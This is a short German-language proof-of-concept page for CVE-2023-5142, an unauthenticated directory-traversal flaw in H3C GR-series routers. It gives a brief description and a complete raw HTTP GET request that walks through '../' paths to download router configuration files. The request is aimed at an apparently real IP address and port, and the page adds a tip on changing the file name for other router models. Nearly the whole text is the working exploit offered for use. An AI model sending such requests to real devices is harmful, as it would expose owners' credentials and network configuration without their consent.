
PoC-Exploit für CVE-2023-5142, der H3C-GR-Serienrouter mit einer nicht authentifizierten Directory-Traversal-Schwachstelle angreift, um sensible Konfigurationsdateien zu extrahieren.
Produkt: GR-Serie Router
Version: alle
Bewertung: hohes Risiko
Webseite: http://www.h3c.com/
Gefahren: Angreifer können diese Schwachstelle ausnutzen, um sensible Informationen von Routern zu erlangen, indem sie spezielle Anfragepakete erstellen, um die Identitätsprüfung zu umgehen.
Prinzip: Der Router hat den Verzeichniszugriff und zugehörige Dateien nicht authentifiziert
Exp:
Hinweis: Es ist notwendig, die Dateinamenerweiterung in POC zu ändern, z.B. GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image